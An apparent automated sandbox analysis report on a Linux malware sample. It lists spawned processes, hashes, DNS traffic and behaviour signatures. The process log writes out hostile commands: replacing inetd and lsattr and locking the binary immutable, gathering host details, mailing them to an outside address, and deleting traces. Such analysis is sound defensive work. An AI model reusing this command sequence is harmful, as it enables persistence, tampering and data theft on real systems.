[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGu-0000De-5L]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGu-0000De-5L]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGz-0000Dk-71]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jH0-0000Dm-5G]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp

Files

/dev/rpm

MD5 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd
SHA1 76015ef9244670de728b830ad330c536f42c4e39
SHA256 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c
SHA512 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7

/dev/rpm

MD5 7d298531c8d0893706bf9c76a40f8386
SHA1 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf
SHA256 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a
SHA512 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973

/dev/rpm

MD5 1894a58fd103ccce773c667411597492
SHA1 248701dcabbff132054e34fd86f9afbd3746ea38
SHA256 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12
SHA512 c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a

/dev/rpm

MD5 1d0177d6d6d055555eb272249d89f54d
SHA1 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3
SHA256 cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e
SHA512 fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab

/dev/rpm

MD5 a56a4ee13c1681711fb6217ec17a8abc
SHA1 6193fa49399265b3efbc7ec47760a23749a278a3
SHA256 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4
SHA512 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0

/dev/last

MD5 29b9e96e561662774c048aaf62f63f99
SHA1 0765b1eaf2054c54fe82e1326617d919f5f200fc
SHA256 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec
SHA512 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a

/dev/last

MD5 ed90c163bc4809cfba41afe945d8c3ac
SHA1 3fc77c1038907a6540022911bb9f74ab260ed576
SHA256 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954
SHA512 a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917

/dev/last

MD5 81ef1d399417bc7c03d5454d426e0e30
SHA1 e830de7de2fedc8688ded4335b6be7f0dcc2cf13
SHA256 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b
SHA512 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb

/dev/last

MD5 ea4abc4909616408ea03fca58e9daf78
SHA1 c368533d40cbcf2d43c2b0f493bced7496fedafd
SHA256 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced
SHA512 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75

/dev/last

MD5 a2e384cb9bf939430cc6d44800052952
SHA1 3cafe08a106154033956aa6bbf2605e0ac94c290
SHA256 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532
SHA512 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058

/tmp/computer

MD5 8f068659378f40f410ceed05ce4eb4cd
SHA1 b047415df69709692f73f1a85de1ae1b84121cf1
SHA256 a4476e2a3a0b88480559a574fba4d9801b71b7cd660c9cf8890b09aa451bd412
SHA512 958bddb268e8032dc9d9c4d363e34a09cda739e29331411de32da80a659453a250bf3e9d9f39e6c2d756783aa2fdb73175c1ae3d3b0b17da7d8bf4e77d17d674

/tmp/computer

MD5 c8f7752120c4c6e14d5a8c17b5c99bf0
SHA1 72bd784dfd52827a2914055be3e7c8c17da26464
SHA256 69e58b15918ca3538691c7b9a5fc55373198220f69d75ff53bc9deedd533d62d
SHA512 f7569aff3561511413e8c5c698f7c5a38c67d8e8d43623eef674018705dd36b0e236e19213fa6c69900f07dc8e0af60228f6d1ffbd88b7d66faa962e768b3317

/tmp/computer

MD5 4c8df643ad00297d38b726b572126e16
SHA1 bec2be7631d7ad720dc20c0f39525b087e4f244f
SHA256 ab30de705315654e3134589920d2587e6e9452bdcdbf770abaf2244d3a023e42
SHA512 b1f6c416f7163e6418da3368e94b31e1b287546ed149940b2ba6ad2beb50917c44ba57df0a80d1429980f568972b625e560522878cd0e9799e7a797b9e090692

/tmp/computer

MD5 37f1db47fc37a093bb93d7120cebd52b
SHA1 9b7d07ba398b2f0eb0830a6b880973b4d40b3a6d
SHA256 99ceeaa2d1ec4c70766aa78f40bcd46f405872968652e692157e76e2c2c6abf0
SHA512 65dcd832f724b14a6873e44ff05a62e140a7a2627966e2b3feeee7f71366bc0a3f6c15f29731326e1d861ef40057662505b7e80b71cc4bb115edc65268102ebf

/tmp/computer

MD5 8dce73ad81db253f60245f11366a6762
SHA1 33da8b87ff4a81ca7668b5976f0ea2ead2545202
SHA256 b268c91adcefea8f2f115f8f6b88c1ce190cb21e30ec2c8ffd23b163385e7e31
SHA512 5ff5a3f40890bb51f3b31a9f75c983d7d49b1b05418414eebbad9ba2ede078cdf0aad1a67c8daed9aeb838cdde36b95e3b2291c02d4da713e7eec3ba25f67dd3

/tmp/computer

MD5 beca71bf200edc891d6cb69d7b2ad1ba
SHA1 e04133e19fcfe726f03334d83b2a9bd7a975dde3
SHA256 086e6365276103262e726b90d8a2cedd03c0a78de639164f4595a54f56df43e6
SHA512 0226fd1ce42c7587e8efcc86441b4e1325084e1485ec027051a39e654a9d4cddbeac777091bd2ea06d54aeaedf1cb9ee9d5956d897a6108dc6af9ed6206e5ca2

/var/spool/exim4/input/1t2jGZ-0000Bq-Hs-D

MD5 04d6a3d969c2001a707229d25c1e5a54
SHA1 2d305db37cb21fc4305988cc9cb1a007d1653dab
SHA256 6314b2af40496bd52b71f14088c338219a7eee7e71e19b6f3a70a827058079e5
SHA512 6e903a8c9f684fbdbc6fc52ec37d52390b41dbc828ef268e56a22c20d87976474a421e43d5f48decfdfbbe9e5015a60473684732cf5c0d701a956019427aee14

/var/spool/exim4/input/hdr.734

MD5 642d2ca083b30aabfb924228669826ba
SHA1 62332316777d867f7055f9ede36accaa41e6c376
SHA256 d5198dcdd66ef29a462d7a0ca23f482fc694892f115ae0c2a895113aba457f38
SHA512 699594f61bbb81a068cc418f7ad6057b0b2d658ad035a7a5ff8e43e54d60b56d9e4b380a97261f8265c3b188468ffac444c511cfecbacdd8821abd7c4fb31b0b

/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs

MD5 0a67dba8634383d9a020657165ed6246
SHA1 dc1d544d98ce18ea2d791575f49fbaefac7ce601
SHA256 42dba61c335e888563772fe41833d1f958ee1fe1ee9897ae3c44099dd06b9247
SHA512 4b5e12ebe57d11d2114dd8b3f168a70c1c1e644fd9ff8a8c4279672f5e401fb49bddeb6103080e62c7c14b417caedc1c01877cbab7a5dbc31b2f65c92b5ffd9d

/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs

MD5 5adf3799176832807650590ead2e4faa
SHA1 286239e8e277fdaad8ef33625bf216c92b4964f8
SHA256 a3a9d425fa78a1cb6dfc6cc4a9fd444fa74d80d02e2791b7b582216bd941c829
SHA512 3ceaa4369ecb09c02803d6808934b5eefa98b92e9001d91d8d3591979a6b87fc69872cb7904e05c21cd4b7730c0ff05c4621cbbacb427637cb544c0cf92bad3a

/var/spool/exim4/input/1t2jGe-0000C3-BH-D

MD5 5d86fc62d58aac35ec2adb902c721c8d
SHA1 6fc280225884d40c2af5942517831e6a86bfdc5d
SHA256 cc33f7dbd9a5e42f823e4a0893de55f038d32ed78f8cb8fdd53c2af4f4f1ed48
SHA512 b4d408635489f3237fd47816a3444efaaed578729f8ec2e063513d6bf6e9b8a3319c55187c762e347ee9a21f641eba9ffccd3e673829fdc77e4fc8ab25f7b5b6

/var/spool/exim4/input/hdr.747

MD5 c8e99586637333b21d4397542e3d8d70
SHA1 45b797b654842514e6b08efa9c35b3d5a0af9c87
SHA256 22426f31739622ccf91c09382d510c217bfac0773e3c24520a370ec706d42e94
SHA512 5c4fda1f146d49ac930d8ebf6e44b808ca402a09e8238850b92c14779c1c6add580be72fca3ee025e9e9d9e2becc8b949211696bed143b4a0395c6f2de224518

/var/spool/exim4/msglog/1t2jGe-0000C3-BH

MD5 4171ae09d7a80a45afa3fecbcb74216c
SHA1 7a87f95d19dba8e01a2dca4b59d7b7b234dde834
SHA256 e47c7972cb11225609e79e9c02adaf39a62bb9fe10963b9f79be1c92660e98ae
SHA512 322f0cbd16c7830cd8201bb82cc1af320e839a0b0478f8d1d49015d745976b626127fce176e658e6a7e64fd4392deae918705b3f342c8812160a9c5133963fec

/var/spool/exim4/input/1t2jGf-0000C6-0x-D

MD5 74010548ac93e5ce693a5ee89f6f7442
SHA1 1df747c757009cbacb7950f14cd1344f0994a025
SHA256 99737a5db171c52c310195796ca986ba5ba037846d66593d897e14f8e32bfbde
SHA512 97dc9f3ee2b7828f588dd7b0c70b01b794ce3af666055a47b6979c9e83cec46c6a487ef3a5a89b9b386b1c6e1ed35c84902633ae9d0b11b90508c3f86e5e8ecc

/var/spool/exim4/input/hdr.750

MD5 b36396191962c8ff98f4e3a65f2cc184
SHA1 311e4a388603c07f329980ca8214cc41eecc4a4c
SHA256 b032df5783bc42a422784edd109adda718b4b9ae0e95aaa1764980eefd0170e3
SHA512 a30eb5fff9792e57a2a268ece286310bc91f53fd884be2015d1b8500e0dc57c82eb6359e51c316528c3d27bef4c3be888053ae329c01153daa61b2b561306d47

/var/spool/exim4/msglog/1t2jGf-0000C6-0x

MD5 7eb525b2f5925e500f263d63a8c4d888
SHA1 e8eaa45d9264e72bfa8e902e392a411cc557ffa2
SHA256 7bd1330bc0087bd0e8f70d188166a3dd50af85f0fbff402eaa9ab0a7fe299930
SHA512 fb6b263679995f2ac3a5753bdbd689aa22cc569515f34d02599a0da9c51adc8bb2ba4cb4a9e933ca2ca031a46062884e2ea1b4b68f8ef5c7962810db44d823fc

/var/spool/exim4/input/hdr.741

MD5 b4bb07d4ab5cf2daff59efbbbf74d411
SHA1 25c73b1bc6f009adfe1cd0261cb9bd53804813e2
SHA256 b9b32bbb2140ec3304a8edb22c6f136742d59e2c7840835e6ca67fb60c407c93
SHA512 88464b566f336e558f1b64d4b694a417964d89f9145a7119250ba971dbf04a4d7ea071d7bdcd22b2c34b664bacfc6ac6c93cdcc61556272750141f62643575bf

/var/spool/exim4/msglog/1t2jGe-0000C3-BH

MD5 84c1d9e4069f06a09380cbb157bdb091
SHA1 d9492f2e9d041c8587e209c67eebbada9e6fa81a
SHA256 81ec2a26956e8893c29c62a6c46fa9698668bb43a83e2f442d9b50b2ea2c5357
SHA512 2e9fa162e8483e431eb73476a8ac68414693d4377a7d337e911659d819b01818c0dda9b9274948c19e88e3a61edb1d69c7d75846ee143ec7d36963b24ff715f8

/var/mail/user

MD5 381d9647046c21f355a5eff683bf91b0
SHA1 bdc7d162fb546dcee8c515826adcbf7ef059d30e
SHA256 82d239c94ec78cb6146c8c5d0f8940c3348c16652727161de3378f97a3600add
SHA512 fa8000453102ff4a9415b7adf6940994f3cb029abf3350e0b36cddd18cb70781b341851d2c28b3afb8d7ed49b283df020866f9d7a58d05edcc731b3baf6d2395

/var/spool/exim4/input/1t2jGf-0000C6-0x-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t2jGf-0000C6-0x

MD5 693b33a41b3ccd965c73506fcc6b9d50
SHA1 2a7a7c9b9ddd3fa87e2c54c23a84eea092dcff88
SHA256 e72b0287606a8c19d81e32bb2bb93aba8848fae4a51b5c0ace29d256109288cb
SHA512 416c0ea18ed91ddefe9c360a721ba289c8e4e558ccc3e0b5e4c467760470774925e5e6262f1636d4582864bc7c210e832eb83fe3cbf2058821e6a0d4a3407669

/computer

MD5 bc55489b7eef4f411a35f4ae10aa68ea
SHA1 cda58593c6342db85e49e37a37fed8682765e292
SHA256 5e79826c4725a7171fe669842f570965d1601b0517bc8c2c946b731214eff722
SHA512 480a5cfb21c6f0e0efb57fc24fb4c71837c1a8af4b74cc65cf5d4adb0d6110dbd6fddc2528736f05976eb4fa80947efe5e7c92d055a0fc6c5fd0e4b14669972c

/computer

MD5 5228b507c439b311ec17f1f7cecb2cbc
SHA1 d1421f7f58b029aa62e84a177773e92a438b793e
SHA256 fe6f264bda476516279fba819fed1ba52e3d09e4a96c17ca8b3a4fbfdc2f72d9
SHA512 1e2daa285a65b4deba7059116ebc90c63a25060dfed2c8f209c079498cc6cbb61b49f2dcf52545ba6e24698cf1fc55f9b5758c571c03ffda08d86417d20b795e

/computer

MD5 6fa7e032dde2f249236a37d4430090eb
SHA1 88ac99ae05862194050801b3cd5fafe81dee3c60
SHA256 8352c21d38716b6bd5ee449b415d798aaf3c6886fb8d6874f8b3e7b45a3a922d
SHA512 a902ed6f6b36070b64b5966e8d9d8e4fbae781572ee097abf7940d1dc69461b6d0d5e51fe92073400ea221e9e988a096d324c2ee387f22b2189f0ca01d4887ed

/var/spool/exim4/input/1t2jGu-0000De-5L-D

MD5 19032970fffe0262da69360d2d7d5377
SHA1 d5571509329c702579570844e910f7d4f4d6c684
SHA256 316ce7b0d72254a078d7aa2ec156cead0c9ce4e7178837b3fca3dc03b46d4086
SHA512 d57b280c789b1bdaf28550d65b1a66c1fa1504cfc645b35a92ff09dc50f5f5c1b9e548c8233b5996e428b909ff41732279136db8a37d401d5ac452ad9085b734

/var/spool/exim4/input/hdr.846

MD5 12a853cf58c142d32b635e3837f9b74b
SHA1 c2f578ff5a94316447ea8c24aab31e0f00d4fb48
SHA256 b16dab7991ccd06f3f9ba404b6bb03f15beafe9fb8702a28e48c8456c3d8cb58
SHA512 d690bc8f8fd8c7e9333036350e6ef9019749363840992143dbaa4a5652d23d8def4f65ff1ec2c9e64b7c6dfd67c04e05afe95c8cd46f4f2c29a22f1d26a6122a

/var/spool/exim4/msglog/1t2jGu-0000De-5L

MD5 68ca470c63cf8030f236682b58c3168c
SHA1 57911934483281828c0adb6e8b1381bda058a905
SHA256 7fc1e8c40a0e8d0231367863360c5fc36be4d920a5220441f41aca306b411789
SHA512 8bdba3e2165a46ea4eb43fd670dbc53cb55311dd6732b7da6bda9fcb133d1bbdd0391afaacc5a8e794778458819088894de1a31f582370204dedcc7e94a52452

/var/spool/exim4/msglog/1t2jGu-0000De-5L

MD5 dc11bf0ca544f2e6ff3479fe2de147b9
SHA1 e966f069c2dd36df32c475e243ffcdff8c120e3f
SHA256 33e96c5a23e5dc5c79cd8c316334120817ffb05dec33665cbcb6819c2ef11017
SHA512 ad72737bdfc36b89bbd73dec8e499cc13c9a088eee7250e9189bc7c9be47252bf7a478e14967e4fc95b4cef2ddbca5a7b41381e778b6481eda862a8a30724302

/var/spool/exim4/input/1t2jGz-0000Dk-71-D

MD5 dec5999fe0df6e0110c9df7cec156ded
SHA1 9d9e0ed1d530c7557053ff278c28e558a50fde13
SHA256 72932bab21f122d4ce2054963bde7f28e158e24056476e5a18f84fe5094dd916
SHA512 e7b32482e91b7876ab537c8e32cddab37446e0ef651748036a025bd97d6f31d2ee26edc290c78e4ca66ef371f3e28acf46d989f02011efda0c490a7e34c3c6eb

/var/spool/exim4/input/hdr.852

MD5 da37c36be403556e761595d8c9a3df04
SHA1 1da8551464ca0488b1b5dff6b1f21ae0062204b1
SHA256 6d2e65d70362df6f0424c7d4f6aaabb491fd6a6693eb4876b134f52dc8d2ddf5
SHA512 1f561ead8b3cb392d075ff1678c11959a40f35931fd1d458235c95612ca0d381f04c78ff1d02895529ddfa0c801a0c3d80dbf2594dbb1161ba119448ab164982

/var/spool/exim4/msglog/1t2jGz-0000Dk-71

MD5 a08934f7c07a2ef72232d6756ca06135
SHA1 c1e9ca1f37cbcd79f3877907e1d24a8eb3050a23
SHA256 3bd452fe1ec879169029f53aacb690d561cdff982475ee802d11062c257cf553
SHA512 67323eb561eb75f460c7e6b1597ec5a3fd3f50fa3c988e2fd22abe3187764998b08bca9a7c427c9c12ff640952b1f806d62615b5f5c2714347cd17de0d2eb92c

/var/spool/exim4/input/1t2jH0-0000Dm-5G-D

MD5 383c941049bed7e39c6cbffacfdf8957
SHA1 8213fd53acceb217387e5fee336cc610ff2d62c8
SHA256 b595e24f2ca55be513f3c2b4e7bcd2016584b09106dacffacb866c3293dfb07a
SHA512 a049abb4ebacd027b871f2f2c87cf920ec5a9cac7fe3cb64235826cdc62f733fd2b5a04276a1973a545596d350a3e3e384b835a50ee0c2e3ed54fb64f3f0f2fc

/var/spool/exim4/input/hdr.854

MD5 e6fb2e4d8b461caf8f84e03a53f68394
SHA1 6f2fed334e67a2e1776b84d92be98aaefca67a1b
SHA256 965d898f32cd1dd5fd5a64f5b67b73c52e0414b148e35d0154cf5f630643f2d4
SHA512 53c7bbbbc9a44d376822323be5a588f995e144ce8dd00e437318aab8540e65f993155b862e348c8a37e7827290a429b342f335e726257a28ab1a9f7f985a3dcc

/var/spool/exim4/msglog/1t2jH0-0000Dm-5G

MD5 d823cafece34e05003dc46bb58ac5b80
SHA1 943f0f894a736c34b21facfa5072dd5643144a4a
SHA256 845605bda62cf128e7923d1ae278371e96572e4033233683a89aa1ab2096dcf3
SHA512 a9f2bd4701791d39b5f010f624c3ec13771422edeee0c90117a29d8cdedf86554f3f9096a8497409a29b68aa76ce867415a878c5004bb96e78e153ed9e9ef603

/var/spool/exim4/input/hdr.849

MD5 e959e5d39dc1cb1fff10790475c4f8bf
SHA1 31577f3e57125345537b71b864c73d5a9527af5f
SHA256 07a2fc31212b6f991c32aec7a56b0b690ab7a8e2015c45d64c4391a07e14dbc5
SHA512 0b05152c0a6ba45a9738ad1dfa69fc597cac07518043706e5e7b9ee046ab16ad0d15c5945d7502acb9ec0bfa3b993c2c79669c985bca08f1b4bdc8aa88f1f0a1

/var/spool/exim4/msglog/1t2jGz-0000Dk-71

MD5 07fadc2d200cb2874d581e4a100555f3
SHA1 6756a02aa6d6645a8013f9d9e0f1dfe1c99f6a30
SHA256 a75f889d709804189d8ee2ecfb34a4368171c19caa15a53ffe6d257d8729221e
SHA512 45ce30344bc8040ecdf0ee0b546e73ef4f494466cb1d77b3b39bf04177d1b990888232597571fb1516deddbb0ae8d8eb2c938db7f9316c26b4ddc8a33a45e49b

/var/mail/user

MD5 db4873366da252523c084eafceb7cc26
SHA1 02934de39f3704014c4567ec140ab032d9f5ca97
SHA256 7c6df4a77640bcd68644dc88e9803d9fb624249a7f1e763f80f5621842d68fab
SHA512 a6a5c511ea21465dc32c136a84e10294dd19e144f9daa5c3786d99ae85f48601e3a0ce246aa2ffb419a827ba40b8abea4a3ce462df232ed3f9912d59a3a1e097

/var/spool/exim4/msglog/1t2jH0-0000Dm-5G

MD5 4e316fae543f4b051d53d645873c27bc
SHA1 677b9dfee1f769816fb960546485415118105d2a
SHA256 907e5d5d4c190f40b67ef1451310b86c26f671ca571c7d45bbbbb3ee212b3fcd
SHA512 cf18a02fa5028746a94ce9f2065f08f4951c4bc2a18fbc5dbc1cc2e06bed09f780720546399072704686cb0444ec04b9fe4d5cfcfe8db7292434c1599bcfddbb

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-mipsbe-20240729-en

Max time kernel

30s

Max time network

32s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/704/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/848/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/700/cmdline /usr/bin/killall N/A
File opened for reading /proc/748/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/425/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/123/cmdline /usr/bin/killall N/A
File opened for reading /proc/701/cmdline /usr/bin/killall N/A
File opened for reading /proc/152/cmdline /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/337/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/247/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/716/stat /usr/bin/killall N/A
File opened for reading /proc/172/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/uptime N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/848/cmdline /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/self/mountinfo /bin/df N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A

Writes file to tmp directory

